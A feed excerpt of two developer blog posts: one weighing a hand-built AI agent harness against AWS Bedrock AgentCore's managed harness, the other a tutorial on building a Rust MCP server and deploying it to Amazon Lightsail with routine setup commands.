      <description>&lt;p&gt;On April 22, 2026, AWS added a "managed agent harness" (preview) to Amazon Bedrock AgentCore. With this feature, you declare the model, system prompt, and tools as configuration, and the agent runs—the orchestration code lives on the AWS side as managed.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://aws.amazon.com/blogs/machine-learning/get-to-your-first-working-agent-in-minutes-announcing-new-features-in-amazon-bedrock-agentcore/" rel="noopener noreferrer"&gt;https://aws.amazon.com/blogs/machine-learning/get-to-your-first-working-agent-in-minutes-announcing-new-features-in-amazon-bedrock-agentcore/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;What stands out about this release is less the feature itself and more AWS's adoption of the term "agent harness." Since Martin Fowler wrote his harness engineering essay in February 2026, Anthropic and OpenAI have started using "harness" officially, and now a cloud vendor has applied the same word to its own service.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://martinfowler.com/articles/harness-engineering.html" rel="noopener noreferrer"&gt;https://martinfowler.com/articles/harness-engineering.html&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;From the perspective of someone who has been assembling a harness by hand, the question becomes: what does managed harness take over, and what stays in my hands? This article sorts out that dividing line. Drawing on experience running business-automation agents with Claude Desktop, multiple MCP servers, and Markdown-based knowledge, I lay out the correspondence with AgentCore managed harness.&lt;/p&gt;

&lt;p&gt;A few "tried it out" articles have already been published, so this article positions itself as the prequel: it offers material for deciding whether to adopt, not adopt, or how to phase in. Drawing on the official blog, documentation, and existing explanatory articles as sources, I sort out the correspondence and the judgment criteria that emerge from self-built operation.&lt;/p&gt;

&lt;h2&gt;
  
  
  AWS released "managed harness"
&lt;/h2&gt;

&lt;p&gt;The official blog mentioned above lays out the structure: every agent has an orchestration layer, and running that layer requires compute, a sandbox to safely execute code, tool connections, persistent storage, and error recovery as the underlying infrastructure—bundled together, they form the agent harness. Managed harness is AWS providing this harness as a managed offering, where the user declares the model, system prompt, and tools as configuration, and a working agent is the result.&lt;/p&gt;

&lt;p&gt;Let me first align on what the word "harness" refers to. The term gets used both for what the vendor builds in (internal) and for what the user assembles around the agent (external), and the meaning shifts with context. In addition to Fowler's framing, watany has organized the internal/external confusion in a Zenn article.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://zenn.dev/watany/articles/d8b692bbca65a3" rel="noopener noreferrer"&gt;https://zenn.dev/watany/articles/d8b692bbca65a3&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This article is written from the position of "someone who has been assembling the external environment by hand"—the user-side harness, in operation. AgentCore managed harness can be read as the vendor-side internal harness now offered as managed, but from the user's perspective, it can also be read as: part of what we used to build for ourselves can now be delegated. This duality is the starting point for thinking about where responsibilities split with self-built operation.&lt;/p&gt;

&lt;h2&gt;
  
  
  Self-built harness composition, the four blank layers
&lt;/h2&gt;

&lt;p&gt;Let me map my self-built harness to AgentCore's components. The environment I've been operating consists, broadly, of three elements, and I'll lay out how each one corresponds to something on the AgentCore side.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Self-built harness&lt;/th&gt;
&lt;th&gt;AgentCore side&lt;/th&gt;
&lt;th&gt;Degree of correspondence&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Markdown knowledge files (under &lt;code&gt;agents/&lt;/code&gt;, &lt;code&gt;knowledge/&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;AgentCore Memory&lt;/td&gt;
&lt;td&gt;Similar role; persistence and retrieval mechanisms differ&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MCP servers (task management / calendar / chat / document management, etc.)&lt;/td&gt;
&lt;td&gt;AgentCore Gateway&lt;/td&gt;
&lt;td&gt;MCP is becoming the standard, so they're close&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Claude Desktop&lt;/td&gt;
&lt;td&gt;AgentCore Runtime&lt;/td&gt;
&lt;td&gt;The execution base for the agent loop, at a different scale&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;(none)&lt;/td&gt;
&lt;td&gt;AgentCore Identity&lt;/td&gt;
&lt;td&gt;Not implemented in self-built&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;(none)&lt;/td&gt;
&lt;td&gt;AgentCore Policy&lt;/td&gt;
&lt;td&gt;Not implemented in self-built&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;(none)&lt;/td&gt;
&lt;td&gt;AgentCore Observability&lt;/td&gt;
&lt;td&gt;Not implemented in self-built&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;(none)&lt;/td&gt;
&lt;td&gt;AgentCore Evaluations&lt;/td&gt;
&lt;td&gt;Not implemented in self-built&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The top three are the correspondence between "what I assembled by hand" and "what AgentCore provides as managed for the same role." The bottom four are blank layers in the self-built harness—components AgentCore offers that aren't covered by my operation.&lt;/p&gt;

&lt;p&gt;The natural question here is whether these four blank layers are "things I didn't write because I didn't need them" or "things I wanted but had given up on." The two are different. For the former, introducing managed harness yields little value; for the latter, it brings value.&lt;/p&gt;

&lt;p&gt;Let me go through the four layers in order.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Identity&lt;/strong&gt; is for managing authentication and permissions when multiple users access the agent. Since my self-built harness runs on a personal device, authentication can rely on the device login, and per-agent authentication wasn't necessary. This is unnecessary "as long as it's just me." The moment you try to share an agent across an organization, controlling who can call which MCP for what becomes a problem, and the gap surfaces in the form of resignation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Policy&lt;/strong&gt; is the mechanism for declaratively defining boundaries when the agent calls tools. It's based on Cedar, AWS's open-source policy language, and you can generate policies from natural language. In my self-built harness, I draw loose boundaries through MCP server scopes and by documenting "what not to do" in the knowledge files—but this is discipline, not enforcement. I had wanted to write strong, enforceable boundaries, but didn't have the motivation to build a Cedar-equivalent system myself, so I had given up on this area.&lt;/p&gt;
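&lt;p&gt;For a sense of what an enforceable boundary looks like, here is a hypothetical Cedar-style policy. The entity types and action names (&lt;code&gt;Agent&lt;/code&gt;, &lt;code&gt;mcp:callTool&lt;/code&gt;, the tool identifiers) are invented for illustration and are not AgentCore's actual schema:&lt;/p&gt;

```
// Hypothetical sketch: permit reading tasks, forbid deleting them.
// Entity types and action names are invented for illustration only.
permit(
  principal == Agent::"task-assistant",
  action == Action::"mcp:callTool",
  resource == Tool::"task-management/list_tasks"
);

forbid(
  principal,
  action == Action::"mcp:callTool",
  resource == Tool::"task-management/delete_task"
);
```

In Cedar's evaluation model, a matching forbid always overrides any permit, which is what makes this enforcement rather than discipline.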

&lt;p&gt;&lt;strong&gt;Observability&lt;/strong&gt; is the mechanism for emitting agent execution logs, traces, and metrics to CloudWatch for visualization. In my self-built harness, I have the conversation history in Claude Desktop and individual logs from each MCP server, but no mechanism to track "which agent called what when, and how it failed" across the board. For solo use, looking at the chat screen suffices, but this becomes necessary in organizational deployment, and falls into the resignation category.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Evaluations&lt;/strong&gt; is the mechanism for continuously evaluating the agent's response quality, with built-in evaluators for dimensions like helpfulness, tool-selection accuracy, and correctness. In my self-built harness, I check subjectively through knowledge-file improvement history and daily work logs, but I have no quantitative quality monitoring. For solo use, subjective is enough; but for organizational operation or paid services, this becomes essential.&lt;/p&gt;

&lt;p&gt;Looking back at the four layers, only Identity falls into "unnecessary as long as it's just me," while the other three fall into "would have been nice, but had given up on as self-built." The fact that the meaning of "blank" differs by layer affects the judgment of whether to adopt managed harness.&lt;/p&gt;

&lt;h2&gt;
  
  
  Layers managed harness takes over, layers it leaves
&lt;/h2&gt;

&lt;p&gt;When you use managed harness, what stops being something you write, and what continues to require writing? This can be derived as fact from the official blog and documentation, so let me sort it out first.&lt;/p&gt;

&lt;p&gt;What managed harness takes over is the following range:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The agent loop: calling the model, selecting tools, returning results, managing context, and recovering from errors&lt;/li&gt;
&lt;li&gt;A microVM, filesystem, and shell isolated per session&lt;/li&gt;
&lt;li&gt;Tool-connection orchestration via AgentCore Gateway&lt;/li&gt;
&lt;li&gt;The framework portion based on Strands Agents&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Conversely, what users still need to write even when using managed harness is the following range:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Which model to use&lt;/li&gt;
&lt;li&gt;What to write in the system prompt&lt;/li&gt;
&lt;li&gt;Which tools to make callable&lt;/li&gt;
&lt;li&gt;What goes into AgentCore Memory and what doesn't&lt;/li&gt;
&lt;li&gt;What boundaries to declare in AgentCore Policy&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Since declaration-based configuration suffices, the amount of code drops significantly. However, for the five items above, only the medium changes; the judgments themselves don't go away. They just shift into the form of the &lt;code&gt;harness.json&lt;/code&gt; configuration file. Reading preview validation articles by people who have actually tried managed harness, you'll see that &lt;code&gt;harness.json&lt;/code&gt; declares the model and the tool list, while a separate &lt;code&gt;system-prompt.md&lt;/code&gt; file holds the system prompt.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://dev.classmethod.jp/articles/bedrock-agentcore-managed-harness-preview/" rel="noopener noreferrer"&gt;https://dev.classmethod.jp/articles/bedrock-agentcore-managed-harness-preview/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/aws-samples/sample-AgentCore-Managed-Harness-News" rel="noopener noreferrer"&gt;https://github.com/aws-samples/sample-AgentCore-Managed-Harness-News&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This looks like what was previously written as Markdown system-prompt files and MCP connection definitions in the self-built harness, repackaged into AWS's configuration file format.&lt;/p&gt;
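&lt;p&gt;To make the correspondence concrete, the following is a rough reconstruction of that shape. Every field name and value here is a guess for illustration, based on the linked validation articles, and is not the official schema:&lt;/p&gt;

```json
{
  "model": "anthropic.claude-3-5-sonnet-20240620-v1:0",
  "systemPromptFile": "system-prompt.md",
  "tools": [
    "gateway:task-management",
    "gateway:calendar"
  ]
}
```

The point is that these three declarations, model, prompt, and tools, are exactly the judgment items listed above: the configuration format changes, the thinking does not.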

&lt;p&gt;In other words, what managed harness takes over is "the labor of writing orchestration code," not "the judgment of designing the agent." Design judgments still rest with the user. AWS expresses this as removing the infrastructure barrier, but the non-infrastructure part—"what is this agent for, and how far should it be allowed to go"—remains on the human side, whether it's managed or self-built.&lt;/p&gt;

&lt;p&gt;This distinction is an important perspective when judging whether to adopt managed harness. The pitch "you don't have to write code" is accurate, but reading it as "you don't have to think" makes it inaccurate.&lt;/p&gt;

&lt;h2&gt;
  
  
  Where self-built operation can articulate "the place of design judgments"
&lt;/h2&gt;

&lt;p&gt;When you operate a self-built harness, you accumulate judgments about "where it's okay to move things, and where you must not." These don't go away when you adopt managed harness. The place where they appear shifts to the contents of &lt;code&gt;harness.json&lt;/code&gt;, but the judgments themselves continue to rest on the human side. Let me name a few representative ones.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Knowledge file granularity.&lt;/strong&gt; Whether to split your Markdown knowledge "by role" or "by task" is a judgment that, once made, eases subsequent operation. Splitting by role lets agent dispatch fall naturally out of context. Splitting by task scatters cross-task knowledge. There's no simple winner; the optimum depends on the number of agents you operate and how tasks overlap. Even with managed harness, the same question—what to combine in Memory and what to separate—remains.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;MCP server combination design.&lt;/strong&gt; This is the line between "how far to wire up as tools via MCP" and "how far to handle through local file operations." For example, task management is better suited to MCP via API for automation, while sensitive tasks are safer kept as local file operations—judgments that emerge through use. Managed harness's Gateway has to answer the same question, just translated into declarations in a tool list.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Agent-to-agent responsibility split.&lt;/strong&gt; This is the design choice between having a coordinator agent that judges context and dispatches to specialist agents, or calling specialist agents directly from the start. The coordinator style depends on context-judgment accuracy; the direct-call style puts the discrimination burden on the user. This too remains as a design judgment in managed harness, in the form of how to arrange and connect multiple harnesses.&lt;/p&gt;

&lt;p&gt;These three are judgments that are hard to articulate without operating self-built first. If you start from managed harness, these judgments end up looking "as if they were optimally placed from the beginning." In reality, you've just fixed the premises, but inside fixed premises, the existence of design judgments themselves becomes harder to see.&lt;/p&gt;

&lt;h3&gt;
  
  
  Why not just use managed harness from the start?
&lt;/h3&gt;

&lt;p&gt;Here's a counterargument I anticipate: "If we just use managed harness from the start, we won't need to build anything ourselves."&lt;/p&gt;

&lt;p&gt;I partially agree. If you're building a new agent for organizational production from zero, entering through managed harness is probably faster. However, the design of an agent that will run in production is rarely visible from the start. Only by actually using the agent do the granularity of knowledge, the oversupply and undersupply of tools, and the boundaries of responsibility come into view. Whether you run this discovery loop on a managed harness with fixed boundaries or on a self-built harness with high freedom changes how much you learn.&lt;/p&gt;

&lt;p&gt;Another perspective: judgments gained from self-built operation can be reused as a blueprint when you migrate to managed harness. If you go into managed harness without a blueprint, you can produce something that appears to work, but a system remains where it's hard to explain why it was structured that way. Whether "let's just put it on managed harness and improve it as we go" works depends on whether one person is improving or multiple people are improving. For one person, the iteration speed gap between self-built and managed may be small; but at the stage where multiple people improve, the declarative changes in &lt;code&gt;harness.json&lt;/code&gt; and the deploy-unit iteration cycle start to take a toll as operational debt.&lt;/p&gt;

&lt;h2&gt;
  
  
  Order of adoption: where personal and organizational use diverge
&lt;/h2&gt;

&lt;p&gt;Whether to adopt managed harness can naturally branch by operational scale. Let me go through three stages.&lt;/p&gt;

&lt;p&gt;In the personal-use stage, where one person is using the agent, the self-built harness is often sufficient. The editing and use of knowledge files are tightly coupled, and the iteration of "rewrite Markdown the moment you notice something while using it" runs fast. Both Identity and Observability are hard to recognize as gaps as long as you're operating solo, and end up in the "would-be-nice-to-have, maybe" zone. In the experimental stage, this freedom directly translates into learning speed.&lt;/p&gt;

&lt;p&gt;At the stage of expanding to organizational operation, where multiple people use the agent, the four blank layers all surface as problems at once. You need audit logs of who used which agent and how (Observability); shared environments must not allow tools to be called freely, so boundaries become necessary (Policy); credentials must be managed per member (Identity); and you want to continuously measure agent response quality (Evaluations). At this stage the value of managed harness comes to the fore: comparing the labor of writing the four layers yourself against putting them on AgentCore, the latter becomes the practical choice.&lt;/p&gt;

&lt;p&gt;In the transition phase, you can take a hybrid strategy. Continue the personal exploration stage with a self-built harness, and put only the confirmed paths used in organizational operation onto managed harness. Move agents whose design has settled to AgentCore in order, and keep agents that are still being learned on while running close at hand.&lt;/p&gt;

&lt;p&gt;There's also a guideline for the order of adoption. The first things needed for organizational deployment are Identity and Observability, then Policy, and finally Evaluations. Without Identity, sharing itself doesn't get established. Without Observability, the organization can't make operational judgments. Policy added after an incident is often too late, so placing it early in organizational deployment is safer. Evaluations can come last: introduce quality measurement once operation is underway.&lt;/p&gt;

&lt;p&gt;The harness was originally a concept lying at the boundary between those who build agents and those who use them. With AWS releasing managed harness, part of what we used to assemble by hand has shifted into a mechanism that runs simply by declaring it as configuration. The fact that layers like Identity, Observability, and Policy—which I had given up on as self-built—have come within reach is no small thing.&lt;/p&gt;

&lt;p&gt;Even so, design judgments such as "what is this agent for," "what to leave in the knowledge," and "how far to grant tools authority" haven't been put into a form you can declare as configuration. The basis for these judgments will continue to live in the commit history and work logs of one's own repository. The experience of having built a self-built harness leaves behind, in your hands, knowledge that doesn't lose its value when you migrate to managed. With the arrival of managed harness, the boundary between "the layers we build ourselves" and "the layers only human judgment can carry" has become more clearly visible than before.&lt;/p&gt;

</description>
      <category>aws</category>
      <category>agents</category>
      <category>ai</category>
      <category>bedrock</category>
    </item>
    <item>
      <title>Deploying a Rust MCP Server to Amazon LightSail</title>
      <dc:creator>xbill</dc:creator>
      <pubDate>Fri, 08 May 2026 18:01:57 +0000</pubDate>
      <link>https://dev.to/aws-builders/deploying-a-rust-mcp-server-to-amazon-lightsail-23j4</link>
      <guid>https://dev.to/aws-builders/deploying-a-rust-mcp-server-to-amazon-lightsail-23j4</guid>
      <description>&lt;p&gt;The rmcp crate and standard Rust libraries are used to build a basic MCP Server in Rust. This MCP Server is then built and deployed to AWS LightSail and validated locally with Gemini CLI&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fagqvrcvpfmyskr0s5a60.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fagqvrcvpfmyskr0s5a60.jpeg" width="800" height="437"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  More MCP Demos?
&lt;/h4&gt;

&lt;p&gt;Yes sir. Ferris the Crab demands it.&lt;/p&gt;

&lt;h4&gt;
  
  
  Why not just use Python?
&lt;/h4&gt;

&lt;p&gt;Python has traditionally been the main coding language for ML and AI tools. One of the strengths of the MCP protocol is that the actual implementation details are independent of the development language. The reality is that not every project is coded in Python, and MCP allows you to use the latest AI approaches with other coding languages.&lt;/p&gt;

&lt;h4&gt;
  
  
  What is this Tutorial Trying to Do?
&lt;/h4&gt;

&lt;p&gt;Building on previous tutorials, the goal is to extend a Rust MCP server with basic support for deployment to AWS.&lt;/p&gt;

&lt;h4&gt;
  
  
  What is Rust?
&lt;/h4&gt;

&lt;p&gt;Rust is a high-performance, memory-safe, compiled language:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://www.rust-lang.org/" rel="noopener noreferrer"&gt;Rust&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Rust provides memory-safe operations beyond C/C++ and can also deliver excellent performance, since it compiles directly to native binaries.&lt;/p&gt;

&lt;h4&gt;
  
  
  So is this the real Slim Shady?
&lt;/h4&gt;

&lt;p&gt;So what is different about this lab compared to all the others out there?&lt;/p&gt;

&lt;p&gt;This is one of the first deep dives into deploying a Rust based MCP server hosted on AWS. The Amazon LightSail service was targeted for ease of setup and deployment.&lt;/p&gt;

&lt;h4&gt;
  
  
  Rust Setup
&lt;/h4&gt;

&lt;p&gt;Instructions to install Rust are available here:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://www.rust-lang.org/learn/get-started" rel="noopener noreferrer"&gt;Getting started&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;For a Linux-like environment the command looks like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;curl — proto ‘&lt;span class="o"&gt;=&lt;/span&gt;https’ — tlsv1.2 &lt;span class="nt"&gt;-sSf&lt;/span&gt; https://sh.rustup.rs | sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Rust also depends on a working C compiler and OpenSSL setup. For a Debian 12 system, install the basic development tools:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;apt &lt;span class="nb"&gt;install &lt;/span&gt;build-essential
&lt;span class="nb"&gt;sudo &lt;/span&gt;apt &lt;span class="nb"&gt;install &lt;/span&gt;libssl-dev
&lt;span class="nb"&gt;sudo &lt;/span&gt;apt &lt;span class="nb"&gt;install &lt;/span&gt;pkg-config
&lt;span class="nb"&gt;sudo &lt;/span&gt;apt-get &lt;span class="nb"&gt;install &lt;/span&gt;libudev-dev
&lt;span class="nb"&gt;sudo &lt;/span&gt;apt &lt;span class="nb"&gt;install &lt;/span&gt;make
&lt;span class="nb"&gt;sudo &lt;/span&gt;apt &lt;span class="nb"&gt;install &lt;/span&gt;git
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Gemini CLI
&lt;/h4&gt;

&lt;p&gt;If not pre-installed, you can download the Gemini CLI to interact with the source files and provide real-time assistance:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;npm &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-g&lt;/span&gt; @google/gemini-cli
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Testing the Gemini CLI Environment
&lt;/h4&gt;

&lt;p&gt;Once you have all the tools and the correct Node.js version in place, you can test the startup of Gemini CLI. You will need to authenticate with an API key or your Google account:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;▝▜▄ Gemini CLI v0.33.1
    ▝▜▄
   ▗▟▀ Logged in with Google /auth
  ▝▀ Gemini Code Assist Standard /upgrade no sandbox (see /docs) /model Auto (Gemini 3) | 239.8 MB
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  AWS CLI
&lt;/h4&gt;

&lt;p&gt;The AWS CLI provides a command line tool to directly access AWS services from your current environment. Full details on the CLI are available here:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://docs.aws.amazon.com/lightsail/latest/userguide/amazon-lightsail-install-software.html" rel="noopener noreferrer"&gt;Install Docker, AWS CLI, and the Lightsail Control plugin for containers&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;You can version check the tool after installation:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;xbill@penguin:~/gemini-cli-aws/mcp-lightsai-rust-aws$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;aws &lt;span class="nt"&gt;--version&lt;/span&gt;
&lt;span class="go"&gt;aws-cli/2.34.43 Python/3.14.4 Linux/6.6.99-09128-g14e87a8a9b71 exe/x86_64.debian.12

&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Amazon Lightsail
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://aws.amazon.com/lightsail/" rel="noopener noreferrer"&gt;Amazon Lightsail&lt;/a&gt; is an easy-to-use virtual private server (VPS) provider and cloud platform designed by AWS for simpler workloads, offering developers pre-configured compute, storage, and networking for a low, predictable monthly price. It is ideal for hosting small websites, simple web apps, or creating development environments.&lt;/p&gt;

&lt;p&gt;More information is available on the official site here:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://aws.amazon.com/free/compute/lightsail/?trk=93c1c080-6a58-41f6-b56e-f352c703feb6&amp;amp;sc_channel=ps&amp;amp;ef_id=CjwKCAjwjtTNBhB0EiwAuswYhjYfDAdZvphotoys8sw1RlOcuvMz1mu6mp0MulOUryHwrqsyynfDEhoCxTEQAvD_BwE:G:s&amp;amp;s_kwcid=AL!4422!3!795794191906!e!!g!!amazon%20lightsail!23527793966!192204323906&amp;amp;gad_campaignid=23527793966&amp;amp;gbraid=0AAAAADjHtp_DJwRcBBdbHLaptszTVpfxR&amp;amp;gclid=CjwKCAjwjtTNBhB0EiwAuswYhjYfDAdZvphotoys8sw1RlOcuvMz1mu6mp0MulOUryHwrqsyynfDEhoCxTEQAvD_BwE" rel="noopener noreferrer"&gt;Amazon's Simple Cloud Server | Amazon Lightsail&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And this is the direct URL to the console:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;https://lightsail.aws.amazon.com/ls/webapp/home/containers
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The Lightsail console will look similar to:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftn56gyfjoo1ykni5gh0z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftn56gyfjoo1ykni5gh0z.png" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Setup the Basic Environment
&lt;/h4&gt;

&lt;p&gt;At this point you should have a working Rust environment and a working Gemini CLI installation. All of the relevant code examples and documentation are available on GitHub.&lt;/p&gt;

&lt;p&gt;The next step is to clone the GitHub repository to your local environment:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd&lt;/span&gt; ~
git clone https://github.com/xbill9/gemini-cli-aws
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then run &lt;strong&gt;init.sh&lt;/strong&gt; from the cloned directory.&lt;/p&gt;

&lt;p&gt;The script will attempt to determine your shell environment and set the correct variables:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;source &lt;/span&gt;init.sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If your session times out or you need to re-authenticate, you can run the &lt;strong&gt;set_env.sh&lt;/strong&gt; script to reset your environment variables:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;source &lt;/span&gt;set_env.sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Variables like PROJECT_ID need to be set up for use in the various build scripts, so the &lt;strong&gt;set_env.sh&lt;/strong&gt; script can be used to reset the environment if your session times out.&lt;/p&gt;
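&lt;p&gt;A minimal sketch of that kind of guard is shown below. The &lt;strong&gt;require_var&lt;/strong&gt; helper name is hypothetical, not a function from the repository's scripts:&lt;/p&gt;

```shell
# Hypothetical helper (not from the repo): fail fast when a required
# environment variable such as PROJECT_ID is missing.
require_var() {
  if [ -z "$(eval "printf '%s' \"\${$1:-}\"")" ]; then
    echo "Missing $1 - run: source set_env.sh"
    return 1
  fi
}
```

&lt;p&gt;Calling &lt;code&gt;require_var PROJECT_ID&lt;/code&gt; at the top of a build script makes a timed-out session fail with a clear message instead of a half-configured deploy.&lt;/p&gt;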

&lt;p&gt;Refresh the AWS credentials:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;xbill@penguin:~/gemini-cli-aws/mcp-lightsail-rust-aws$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;aws login &lt;span class="nt"&gt;--remote&lt;/span&gt;
&lt;span class="go"&gt;Browser will not be automatically opened.

&lt;/span&gt;&lt;span class="gp"&gt;xbill@penguin:~/gemini-cli-aws/mcp-ligthsail-rust-aws$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;source &lt;/span&gt;save-aws-creds.sh 
&lt;span class="go"&gt;Exporting AWS credentials...
Successfully saved credentials to .aws_creds
The Makefile will now automatically use these for deployments.

&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Finally install the packages and dependencies:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;~/gemini-cli-aws/mcp-lightsail-rust-aws 
make &lt;span class="nb"&gt;install&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Build The Rust MCP Server
&lt;/h4&gt;

&lt;p&gt;Some background information on building and configuring a Rust MCP server is here:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://xbill999.medium.com/building-a-secure-http-transport-mcp-server-with-rust-and-gemini-cli-b4e807e7aa1d" rel="noopener noreferrer"&gt;Building a Secure HTTP Transport MCP Server with Rust, and Gemini CLI&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The mcp-lightsail-rust-aws subdirectory contains the complete Rust MCP server.&lt;/p&gt;

&lt;h4&gt;
  
  
  Minimal System Information Tool Build
&lt;/h4&gt;

&lt;p&gt;The first step is to build the basic tool directly with Rust. This allows the tool to be debugged and tested locally before adding the MCP layer.&lt;/p&gt;

&lt;p&gt;First build the tool locally:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;xbill@penguin:~/gemini-cli-aws/mcp-lightsail-rust-aws$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;make
&lt;span class="go"&gt;Building the Rust project...
   Compiling mcp-lightsail-rust-aws v1.0.0 (/home/xbill/gemini-cli-aws/mcp-lightsail-rust-aws)
    Finished `dev` profile [unoptimized + debuginfo] target(s) in 7.67s
&lt;/span&gt;&lt;span class="gp"&gt;xbill@penguin:~/gemini-cli-aws/mcp-lightsail-rust-aws$&lt;/span&gt;&lt;span class="w"&gt; 
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



